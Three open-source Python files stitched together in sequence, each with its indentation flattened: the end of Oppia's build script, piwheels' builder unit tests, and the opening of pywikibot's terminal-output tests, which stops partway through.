if not os.path.isdir(staging_dir):
# If there is no staging dir, perform build process on all files.
python_utils.PRINT('Creating new %s folder' % staging_dir)
ensure_directory_exists(staging_dir)
build_tasks += generate_build_tasks_to_build_all_files_in_directory(
source_dir, staging_dir)
else:
# If staging dir exists, rebuild all HTML and Python files.
file_extensions_to_always_rebuild = ('.html', '.py',)
python_utils.PRINT(
'Staging dir exists, re-building all %s files'
% ', '.join(file_extensions_to_always_rebuild))
filenames_to_always_rebuild = get_filepaths_by_extensions(
source_dir, file_extensions_to_always_rebuild)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, filenames_to_always_rebuild)
dev_dir_hashes = get_file_hashes(source_dir)
source_hashes = {}
source_hashes.update(dev_dir_hashes)
# Clean up files in staging directory that cannot be found in file
# hashes dictionary.
_execute_tasks(generate_delete_tasks_to_remove_deleted_files(
source_hashes, staging_dir))
python_utils.PRINT(
'Getting files that have changed between %s and %s'
% (source_dir, out_dir))
recently_changed_filenames = get_recently_changed_filenames(
dev_dir_hashes, out_dir)
if recently_changed_filenames:
python_utils.PRINT(
'Re-building recently changed files at %s' % source_dir)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, recently_changed_filenames)
else:
python_utils.PRINT(
'No changes detected. Using previously built files.')
return build_tasks
def _verify_filepath_hash(relative_filepath, file_hashes):
"""Ensure that hashes in filepaths match with the hash entries in hash
dict.
Args:
relative_filepath: str. Filepath that is relative from /build.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Raises:
ValueError: The hash dict is empty.
ValueError: Filepath has less than 2 partitions after splitting by '.'
delimiter.
ValueError: The filename does not contain hash.
KeyError: The filename's hash cannot be found in the hash dict.
"""
# Final filepath example:
# head/pages/base.240933e7564bd72a4dde42ee23260c5f.html.
if not file_hashes:
raise ValueError('Hash dict is empty')
filename_partitions = relative_filepath.split('.')
if len(filename_partitions) < 2:
raise ValueError('Filepath has less than 2 partitions after splitting')
hash_string_from_filename = filename_partitions[-2]
# Ensure hash string obtained from filename follows MD5 hash format.
if not re.search(r'([a-fA-F\d]{32})', relative_filepath):
if relative_filepath not in file_hashes:
return
raise ValueError(
'%s is expected to contain MD5 hash' % relative_filepath)
if hash_string_from_filename not in file_hashes.values():
raise KeyError(
'Hash from file named %s does not match hash dict values' %
relative_filepath)
def _verify_hashes(output_dirnames, file_hashes):
"""Verify a few metrics after build process finishes:
1) The hashes in filenames belong to the hash dict.
2) hashes.json, third_party.min.css and third_party.min.js are built and
hashes are inserted.
Args:
output_dirnames: list(str). List of directory paths that contain
built files.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
"""
# Make sure that hashed file name matches with current hash dict.
for built_dir in output_dirnames:
for root, _, filenames in os.walk(built_dir):
for filename in filenames:
parent_dir = os.path.basename(root)
converted_filepath = os.path.join(
THIRD_PARTY_GENERATED_DEV_DIR, parent_dir, filename)
if hash_should_be_inserted(converted_filepath):
# Obtain the same filepath format as the hash dict's key.
relative_filepath = os.path.relpath(
os.path.join(root, filename), built_dir)
_verify_filepath_hash(relative_filepath, file_hashes)
hash_final_filename = _insert_hash(
HASHES_JSON_FILENAME, file_hashes[HASHES_JSON_FILENAME])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_js_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_css_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)])
_ensure_files_exist([
os.path.join(ASSETS_OUT_DIR, hash_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_js_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_css_final_filename)])
def generate_hashes():
"""Generates hashes for files."""
# The keys for hashes are filepaths relative to the subfolders of the future
# /build folder. This is so that the replacing inside the HTML files works
# correctly.
hashes = dict()
# Create hashes for all directories and files.
HASH_DIRS = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir'],
THIRD_PARTY_GENERATED_DEV_DIR]
for HASH_DIR in HASH_DIRS:
hashes.update(get_file_hashes(HASH_DIR))
# Save hashes as JSON and write the JSON into JS file
# to make the hashes available to the frontend.
save_hashes_to_file(hashes)
# Update hash dict with newly created hashes.json.
hashes.update(
{HASHES_JSON_FILENAME: generate_md5_hash(HASHES_JSON_FILEPATH)})
# Make sure /assets/hashes.json is available to the frontend.
_ensure_files_exist([HASHES_JSON_FILEPATH])
return hashes
def generate_build_directory(hashes):
"""Generates hashes for files. Minifies files and interpolates paths
in HTMLs to include hashes. Renames the files to include hashes and copies
them into build directory.
"""
python_utils.PRINT('Building Oppia in production mode...')
build_tasks = collections.deque()
copy_tasks = collections.deque()
# Build files in /extensions and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
EXTENSIONS_DIRNAMES_TO_DIRPATHS)
# Minify all template files and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS)
_execute_tasks(build_tasks)
# Copy all files from staging directory to production directory.
COPY_INPUT_DIRS = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['staging_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['staging_dir'],
THIRD_PARTY_GENERATED_DEV_DIR,
WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
COPY_OUTPUT_DIRS = [
ASSETS_OUT_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir'],
THIRD_PARTY_GENERATED_OUT_DIR, WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
assert len(COPY_INPUT_DIRS) == len(COPY_OUTPUT_DIRS)
for i in python_utils.RANGE(len(COPY_INPUT_DIRS)):
safe_delete_directory_tree(COPY_OUTPUT_DIRS[i])
copy_tasks += generate_copy_tasks_to_copy_from_source_to_target(
COPY_INPUT_DIRS[i], COPY_OUTPUT_DIRS[i], hashes)
_execute_tasks(copy_tasks)
_verify_hashes(COPY_OUTPUT_DIRS, hashes)
SOURCE_DIRS_FOR_ASSETS = [ASSETS_DEV_DIR, THIRD_PARTY_GENERATED_DEV_DIR]
OUTPUT_DIRS_FOR_ASSETS = [ASSETS_OUT_DIR, THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(SOURCE_DIRS_FOR_ASSETS, OUTPUT_DIRS_FOR_ASSETS)
SOURCE_DIRS_FOR_THIRD_PARTY = [THIRD_PARTY_GENERATED_DEV_DIR]
OUTPUT_DIRS_FOR_THIRD_PARTY = [THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(
SOURCE_DIRS_FOR_THIRD_PARTY, OUTPUT_DIRS_FOR_THIRD_PARTY)
SOURCE_DIRS_FOR_WEBPACK = [WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
OUTPUT_DIRS_FOR_WEBPACK = [WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(
SOURCE_DIRS_FOR_WEBPACK, OUTPUT_DIRS_FOR_WEBPACK)
SOURCE_DIRS_FOR_EXTENSIONS = [
EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir']]
OUTPUT_DIRS_FOR_EXTENSIONS = [EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(SOURCE_DIRS_FOR_EXTENSIONS, OUTPUT_DIRS_FOR_EXTENSIONS)
SOURCE_DIRS_FOR_TEMPLATES = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir']]
OUTPUT_DIRS_FOR_TEMPLATES = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(SOURCE_DIRS_FOR_TEMPLATES, OUTPUT_DIRS_FOR_TEMPLATES)
python_utils.PRINT('Build completed.')
def main(args=None):
"""The main method of this script."""
options = _PARSER.parse_args(args=args)
# Regenerate /third_party/generated from scratch.
safe_delete_directory_tree(THIRD_PARTY_GENERATED_DEV_DIR)
build_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
# If minify_third_party_libs_only is set to True, skips the rest of the
# build process once third party libs are minified.
if options.minify_third_party_libs_only and not options.prod_mode:
raise Exception(
'minify_third_party_libs_only should not be set in non-prod mode.')
if options.prod_mode:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
if not options.minify_third_party_libs_only:
hashes = generate_hashes()
build_using_webpack()
generate_app_yaml(is_prod_mode=options.prod_mode)
generate_build_directory(hashes)
save_hashes_to_file(dict())
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when build.py is used as a script.
if __name__ == '__main__': # pragma: no cover
main()
|
test_builder.py | # The piwheels project
# Copyright (c) 2017 Ben Nuttall <https://github.com/bennuttall>
# Copyright (c) 2017 Dave Jones <dave@waveform.org.uk>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import re
import os
import io
import zipfile
from hashlib import sha256
from unittest import mock
from pathlib import Path
from threading import Thread, Event
from datetime import datetime, timedelta
import pytest
from piwheels import transport, proc
from piwheels.slave import builder
@pytest.fixture()
def bad_archive(request):
archive = io.BytesIO()
with zipfile.ZipFile(archive, 'w', compression=zipfile.ZIP_STORED) as arc:
arc.writestr('foo/__init__.py', b'\x00' * 123456)
arc.writestr('foo/foo.cpython-34m-linux_armv7l-linux-gnu.so',
b'\x7FELF' + b'\xFF' * 123456)
arc.writestr('foo/im.not.really.a.library.so.there',
b'blah' * 4096)
return archive.getvalue()
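# Note: this archive is "bad" because it contains shared objects but no
# foo-0.1.dist-info/METADATA entry; the mock_archive fixture below rebuilds
# it with METADATA added.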
@pytest.fixture()
def mock_archive(request, bad_archive):
source = io.BytesIO(bad_archive)
archive = io.BytesIO()
with zipfile.ZipFile(source, 'r') as src:
with zipfile.ZipFile(archive, 'w', compression=zipfile.ZIP_STORED) as dest:
for info in src.infolist():
dest.writestr(info, src.read(info))
dest.writestr('foo-0.1.dist-info/METADATA', """\
Metadata-Version: 2.0
Name: foo
Version: 0.1
Summary: A test package
Home-page: http://foo.com/
Author: Some foo
Author-email: foo@foo.com
License: BSD
Platform: any
Classifier: Development Status :: 5 - Production/Stable
Classifier: Intended Audience :: Developers
Classifier: License :: OSI Approved :: BSD License
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python
""")
return archive.getvalue()
@pytest.fixture()
def bad_package(request, bad_archive):
with mock.patch('piwheels.slave.builder.Path.stat') as stat_mock, \
mock.patch('piwheels.slave.builder.Path.open') as open_mock:
stat_mock.return_value = os.stat_result(
(0o644, 1, 1, 1, 1000, 1000, len(bad_archive), 0, 0, 0))
open_mock.side_effect = lambda mode: io.BytesIO(bad_archive)
h = sha256()
h.update(bad_archive)
yield len(bad_archive), h.hexdigest().lower()
@pytest.fixture()
def mock_package(request, mock_archive):
with mock.patch('piwheels.slave.builder.Path.stat') as stat_mock, \
mock.patch('piwheels.slave.builder.Path.open') as open_mock:
stat_mock.return_value = os.stat_result(
(0o644, 1, 1, 1, 1000, 1000, len(mock_archive), 0, 0, 0))
open_mock.side_effect = lambda mode: io.BytesIO(mock_archive)
h = sha256()
h.update(mock_archive)
yield len(mock_archive), h.hexdigest().lower()
@pytest.fixture()
def transfer_thread(request, zmq_context, mock_systemd, mock_package):
with zmq_context.socket(transport.DEALER) as server_sock, \
zmq_context.socket(transport.DEALER) as client_sock:
server_sock.bind('inproc://test-transfer')
client_sock.connect('inproc://test-transfer')
filesize, filehash = mock_package
path = Path('/tmp/abc123/foo-0.1-cp34-cp34m-linux_armv7l.whl')
pkg = builder.Wheel(path)
client_thread = Thread(target=pkg.transfer, args=(client_sock, 1))
client_thread.start()
yield server_sock
client_thread.join(10)
assert not client_thread.is_alive()
def test_package_init(mock_package):
filesize, filehash = mock_package
path = Path('/tmp/abc123/foo-0.1-cp34-cp34m-linux_armv7l.whl')
pkg = builder.Wheel(path)
assert pkg.filename == 'foo-0.1-cp34-cp34m-linux_armv7l.whl'
assert pkg.filesize == filesize
assert pkg.filehash == filehash
assert pkg.package_tag == 'foo'
assert pkg.package_version_tag == '0.1'
assert pkg.platform_tag == 'linux_armv7l'
assert pkg.abi_tag == 'cp34m'
assert pkg.py_version_tag == 'cp34'
assert pkg.build_tag is None
def test_package_noabi(mock_package):
filesize, filehash = mock_package
path = Path('/tmp/abc123/foo-0.1-cp34-noabi-any.whl')
pkg = builder.Wheel(path)
assert pkg.filename == 'foo-0.1-cp34-noabi-any.whl'
assert pkg.filesize == filesize
assert pkg.filehash == filehash
assert pkg.package_tag == 'foo'
assert pkg.package_version_tag == '0.1'
assert pkg.platform_tag == 'any'
assert pkg.abi_tag == 'none'
assert pkg.py_version_tag == 'cp34'
assert pkg.build_tag is None
def test_package_hash_cache(mock_package):
filesize, filehash = mock_package
path = Path('/tmp/abc123/foo-0.1-cp34-noabi-any.whl')
pkg = builder.Wheel(path)
assert pkg.filehash == filehash
# Second retrieval is cached
assert pkg.filehash == filehash
def test_package_open(mock_package):
path = Path('/tmp/abc123/foo-0.1-cp34-cp34m-linux_armv7l.whl')
pkg = builder.Wheel(path)
with pkg.open() as f:
with zipfile.ZipFile(f) as arc:
assert len(arc.namelist()) == 4
assert 'foo-0.1.dist-info/METADATA' in arc.namelist()
assert 'foo/foo.cpython-34m-linux_armv7l-linux-gnu.so' in arc.namelist()
assert 'foo/__init__.py' in arc.namelist()
def test_package_metadata(mock_package):
path = Path('/tmp/abc123/foo-0.1-cp34-cp34m-linux_armv7l.whl')
pkg = builder.Wheel(path)
assert pkg.metadata['Metadata-Version'] == '2.0'
assert pkg.metadata['Name'] == 'foo'
assert pkg.metadata['Version'] == '0.1'
def test_package_metadata_canon(mock_package):
path = Path('/tmp/abc123/Foo-0.1-cp34-cp34m-linux_armv7l.whl')
pkg = builder.Wheel(path)
assert pkg.metadata['Metadata-Version'] == '2.0'
assert pkg.metadata['Name'] == 'foo'
assert pkg.metadata['Version'] == '0.1'
def test_package_bad_metadata(bad_package):
path = Path('/tmp/abc123/foo-0.1-cp34-cp34m-linux_armv7l.whl')
with pytest.raises(builder.BadWheel):
builder.Wheel(path)
def test_package_transfer(mock_archive, mock_package, transfer_thread):
filesize, filehash = mock_package
path = Path('/tmp/abc123/foo-0.1-cp34-cp34m-linux_armv7l.whl')
pkg = builder.Wheel(path)
assert transfer_thread.recv_multipart() == [b'HELLO', b'1']
transfer_thread.send_multipart([b'FETCH', b'0', str(filesize).encode('ascii')])
assert transfer_thread.recv_multipart() == [b'CHUNK', b'0', mock_archive]
transfer_thread.send_multipart([b'DONE'])
def test_package_transfer_nonsense(mock_archive, mock_package, transfer_thread):
filesize, filehash = mock_package
path = Path('/tmp/abc123/foo-0.1-cp34-cp34m-linux_armv7l.whl')
pkg = builder.Wheel(path)
assert transfer_thread.recv_multipart() == [b'HELLO', b'1']
transfer_thread.send_multipart([b'FOO', b'BAR'])
# Continue with the transfer normally; the anomalous message should be
# ignored and the protocol should continue
transfer_thread.send_multipart([b'FETCH', b'0', b'4096'])
transfer_thread.send_multipart([b'FETCH', b'4096', str(filesize - 4096).encode('ascii')])
chunk1 = transfer_thread.recv_multipart()
chunk2 = transfer_thread.recv_multipart()
assert chunk1 == [b'CHUNK', b'0', mock_archive[:4096]]
assert chunk2 == [b'CHUNK', b'4096', mock_archive[4096:]]
transfer_thread.send_multipart([b'DONE'])
def test_builder_init(tmpdir):
b = builder.Builder('foo', '0.1', dir=str(tmpdir))
assert b.package == 'foo'
assert b.version == '0.1'
assert b.duration is None
assert b.output == ''
assert b.wheels == []
assert b.status is False
assert b.timeout == timedelta(minutes=5)
def test_builder_as_message():
b = builder.Builder('foo', '0.1')
assert b.as_message() == ['foo', '0.1', False, None, '', []]
def test_builder_build_success(mock_archive, tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc') as proc_mock, \
mock.patch('piwheels.slave.builder.Builder.build_dependencies') as dep_mock:
tmpdir_mock().name = str(tmpdir)
def call(*args, **kwargs):
with tmpdir.join('foo-0.1-cp34-cp34m-linux_armv7l.whl').open('wb') as f:
f.write(mock_archive)
return 0
proc_mock.call.side_effect = call
b = builder.Builder('foo', '0.1')
b.start()
b.join(1)
assert not b.is_alive()
assert b.status
args, kwargs = proc_mock.call.call_args
assert args[0][-1] == 'foo==0.1'
assert len(b.wheels) == 1
assert b.wheels[0].filename == 'foo-0.1-cp34-cp34m-linux_armv7l.whl'
def test_builder_build_timeout(tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc') as proc_mock, \
mock.patch('piwheels.slave.builder.datetime') as time_mock:
tmpdir_mock().name = str(tmpdir)
proc_mock.call.side_effect = proc.TimeoutExpired(['pip3'], 300)
now = datetime.utcnow()
time_mock.utcnow.side_effect = [
now, now + timedelta(seconds=100), now + timedelta(seconds=1000),
now + timedelta(seconds=1001)]
b = builder.Builder('foo', '0.1')
b.start()
b.join(1)
assert not b.is_alive()
assert not b.status
args, kwargs = proc_mock.call.call_args
assert args[0][-1] == 'foo==0.1'
assert len(b.wheels) == 0
def test_builder_build_stop(tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc') as proc_mock, \
mock.patch('piwheels.slave.builder.datetime') as time_mock:
tmpdir_mock().name = str(tmpdir)
def call(*args, **kwargs):
assert b._stopped.wait(2)
raise proc.ProcessTerminated('pip3', b._stopped)
proc_mock.call.side_effect = call
time_mock.utcnow.return_value = datetime.utcnow()
b = builder.Builder('foo', '0.1')
b.start()
b.stop()
b.join(1)
assert not b.is_alive()
assert not b.status
assert b.output.endswith("Command 'pip3' was terminated early by event")
assert len(b.wheels) == 0
def test_builder_build_close(tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc') as proc_mock:
tmpdir_mock().name = str(tmpdir)
proc_mock.call.return_value = 0
b = builder.Builder('foo', '0.1')
b.start()
b.join(1)
assert not b.is_alive()
assert b.status
b.close()
assert tmpdir_mock().cleanup.call_args == mock.call()
def test_builder_build_dependencies(mock_archive, tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc') as proc_mock, \
mock.patch('piwheels.slave.builder.Path.resolve', lambda self: self), \
mock.patch('piwheels.slave.builder.apt') as apt_mock:
tmpdir_mock().name = str(tmpdir)
tmpdir_mock().__enter__.return_value = str(tmpdir)
def call(*args, **kwargs):
with tmpdir.join('foo-0.1-cp34-cp34m-linux_armv7l.whl').open('wb') as f:
f.write(mock_archive)
return 0
proc_mock.call.side_effect = call
proc_mock.check_output.return_value = b"""\
linux-vdso.so.1 => (0x00007ffd48669000)
libblas.so.3 => /usr/lib/libblas.so.3 (0x00007f711a958000)
libm.so.6 => /lib/arm-linux-gnueabihf/libm.so.6 (0x00007f711a64f000)
libpthread.so.0 => /lib/arm-linux-gnueabihf/libpthread.so.0 (0x00007f711a432000)
libc.so.6 => /lib/arm-linux-gnueabihf/libc.so.6 (0x00007f711a068000)
/lib64/ld-linux-x86-64.so.2 (0x00007f711af48000)
libopenblas.so.0 => /usr/lib/libopenblas.so.0 (0x00007f7117fd4000)
libgfortran.so.3 => /usr/lib/arm-linux-gnueabihf/libgfortran.so.3 (0x00007f7117ca9000)
libquadmath.so.0 => /usr/lib/arm-linux-gnueabihf/libquadmath.so.0 (0x00007f7117a6a000)
libgcc_s.so.1 => /lib/arm-linux-gnueabihf/libgcc_s.so.1 (0x00007f7117854000)
"""
def pkg(name, files):
m = mock.Mock()
m.name = name
m.installed = True
m.installed_files = files
return m
apt_mock.cache.Cache.return_value = [
pkg('libc6', [
'/lib/arm-linux-gnueabihf/libc.so.6',
'/lib/arm-linux-gnueabihf/libm.so.6',
'/lib/arm-linux-gnueabihf/libpthread.so.0',
]),
pkg('libopenblas-base', [
'/usr/lib/libblas.so.3',
'/usr/lib/libopenblas.so.0',
]),
pkg('libgcc1', ['/lib/arm-linux-gnueabihf/libgcc_s.so.1']),
pkg('libgfortran3', ['/usr/lib/arm-linux-gnueabihf/libgfortran.so.3']),
]
b = builder.Builder('foo', '0.1')
b.start()
b.join(1)
assert not b.is_alive()
assert b.status
assert b.wheels[0].dependencies == {
'apt': ['libc6', 'libgcc1', 'libgfortran3', 'libopenblas-base'],
'': ['/usr/lib/arm-linux-gnueabihf/libquadmath.so.0'],
}
def test_builder_dependencies_missing(mock_archive, tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc') as proc_mock, \
mock.patch('piwheels.slave.builder.Path.resolve', side_effect=FileNotFoundError()), \
mock.patch('piwheels.slave.builder.apt') as apt_mock:
tmpdir_mock().name = str(tmpdir)
tmpdir_mock().__enter__.return_value = str(tmpdir)
def call(*args, **kwargs):
with tmpdir.join('foo-0.1-cp34-cp34m-linux_armv7l.whl').open('wb') as f:
f.write(mock_archive)
return 0
proc_mock.call.side_effect = call
proc_mock.check_output.return_value = (
b"libopenblas.so.0 => /usr/lib/libopenblas.so.0 (0x00007f7117fd4000)")
b = builder.Builder('foo', '0.1')
b.start()
b.join(1)
assert not b.is_alive()
assert b.status
assert b.wheels[0].dependencies == {}
def test_builder_dependencies_failed(mock_archive, tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc.call') as call_mock, \
mock.patch('piwheels.slave.builder.proc.check_output') as output_mock, \
mock.patch('piwheels.slave.builder.apt') as apt_mock:
tmpdir_mock().name = str(tmpdir)
tmpdir_mock().__enter__.return_value = str(tmpdir)
def call(*args, **kwargs):
with tmpdir.join('foo-0.1-cp34-cp34m-linux_armv7l.whl').open('wb') as f:
f.write(mock_archive)
return 0
call_mock.side_effect = call
output_mock.side_effect = proc.TimeoutExpired('ldd', 30)
b = builder.Builder('foo', '0.1')
b.start()
b.join(1)
assert not b.is_alive()
assert not b.status
assert not b.wheels
def test_builder_dependencies_stopped(mock_archive, tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc.call') as call_mock, \
mock.patch('piwheels.slave.builder.proc.check_output') as output_mock, \
mock.patch('piwheels.slave.builder.apt') as apt_mock, \
mock.patch('piwheels.slave.builder.Path.resolve') as resolve_mock:
tmpdir_mock().name = str(tmpdir)
tmpdir_mock().__enter__.return_value = str(tmpdir)
def call(*args, **kwargs):
with tmpdir.join('foo-0.1-cp34-cp34m-linux_armv7l.whl').open('wb') as f:
f.write(mock_archive)
return 0
def stop(*args, **kwargs):
b.stop()
return b"libopenblas.so.0 => /usr/lib/libopenblas.so.0 (0x00007f7117fd4000)"
call_mock.side_effect = call
output_mock.side_effect = stop
resolve_mock.return_value = '/usr/lib/libopenblas.so.0'
b = builder.Builder('foo', '0.1')
b.start()
b.join(1)
assert not b.is_alive()
assert not b.status
assert re.search(r'Command .* was terminated early by event$', b.output)
def test_builder_bad_metadata(bad_archive, tmpdir):
with mock.patch('tempfile.TemporaryDirectory') as tmpdir_mock, \
mock.patch('piwheels.slave.builder.proc.call') as call_mock:
tmpdir_mock().name = str(tmpdir)
tmpdir_mock().__enter__.return_value = str(tmpdir)
def call(*args, **kwargs):
with tmpdir.join('foo-0.1-cp34-cp34m-linux_armv7l.whl').open('wb') as f:
f.write(bad_archive)
return 0
call_mock.side_effect = call
b = builder.Builder('foo', '0.1')
b.start()
b.join(1)
assert not b.is_alive()
assert not b.status
assert not b.wheels
assert re.search(r'Unable to locate METADATA in', b.output)
|
ui_tests.py | # -*- coding: utf-8 -*-
"""
Tests for the page module.
"""
#
# (C) Pywikipedia bot team, 2008
#
# Distributed under the terms of the MIT license.
#
__version__ = '$Id: dba6bc16d605e3529dedc9c8e946a74e2c9ee99c $'
import unittest
import cStringIO
import StringIO
import logging
import os
import sys
if os.name == "nt":
from multiprocessing.managers import BaseManager
import threading
import win32clipboard
class pywikibotWrapper(object):
def init(self):
import pywikibot
def output(self, *args, **kwargs):
import pywikibot
return pywikibot.output(*args, **kwargs)
def request_input(self, *args, **kwargs):
import pywikibot
self.input = None
def threadedinput():
self.input = pywikibot.input(*args, **kwargs)
self.inputthread = threading.Thread(target=threadedinput)
self.inputthread.start()
def get_input(self):
self.inputthread.join()
return self.input
def set_config(self, key, value):
import pywikibot
setattr(pywikibot.config, key, value)
def set_ui(self, key, value):
import pywikibot
setattr(pywikibot.ui, key, value)
def cls(self):
os.system('cls')
class pywikibotManager(BaseManager):
pass
pywikibotManager.register('pywikibot', pywikibotWrapper)
_manager = pywikibotManager(address=("127.0.0.1", 47228), authkey="4DJSchgwy5L5JxueZEWbxyeG")
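# The manager above exposes pywikibotWrapper as a remote proxy over TCP; when this
# script is launched with --run-as-slave-interpreter it serves pywikibot calls for
# the test process (TestWindowsTerminalUnicode below connects to it).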
if len(sys.argv) > 1 and sys.argv[1] == "--run-as-slave-interpreter":
s = _manager.get_server()
s.serve_forever()
if __name__ == "__main__":
oldstderr = sys.stderr
oldstdout = sys.stdout
oldstdin = sys.stdin
newstdout = cStringIO.StringIO()
newstderr = cStringIO.StringIO()
newstdin = StringIO.StringIO()
def patch():
sys.stdout = newstdout
sys.stderr = newstderr
sys.stdin = newstdin
def unpatch():
sys.stdout = oldstdout
sys.stderr = oldstderr
sys.stdin = oldstdin
try:
patch()
import pywikibot
finally:
unpatch()
from pywikibot.bot import DEBUG, VERBOSE, INFO, STDOUT, INPUT, WARNING, ERROR, CRITICAL
logger = logging.getLogger('pywiki')
loggingcontext = {'caller_name': "ui_tests",
'caller_file': "ui_tests",
'caller_line': 0,
'newline': "\n"}
class UITestCase(unittest.TestCase):
def setUp(self):
patch()
newstdout.truncate(0)
newstderr.truncate(0)
newstdin.truncate(0)
pywikibot.config.colorized_output = True
pywikibot.config.transliterate = False
pywikibot.ui.transliteration_target = None
pywikibot.ui.encoding = 'utf-8'
def tearDown(self):
unpatch()
class TestTerminalOutput(UITestCase):
def testOutputLevels_logging_debug(self):
logger.log(DEBUG, 'debug', extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "")
def testOutputLevels_logging_verbose(self):
logger.log(VERBOSE, 'verbose', extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "")
def testOutputLevels_logging_info(self):
logger.log(INFO, 'info', extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "info\n")
def testOutputLevels_logging_stdout(self):
logger.log(STDOUT, 'stdout', extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), "stdout\n")
self.assertEqual(newstderr.getvalue(), "")
def testOutputLevels_logging_input(self):
logger.log(INPUT, 'input', extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "input\n")
def testOutputLevels_logging_WARNING(self):
logger.log(WARNING, 'WARNING', extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "WARNING: WARNING\n")
def testOutputLevels_logging_ERROR(self):
logger.log(ERROR, 'ERROR', extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "ERROR: ERROR\n")
def testOutputLevels_logging_CRITICAL(self):
logger.log(CRITICAL, 'CRITICAL', extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "CRITICAL: CRITICAL\n")
def test_output(self):
pywikibot.output("output", toStdout=False)
self.assertEqual(newstdout.getvalue(), "")
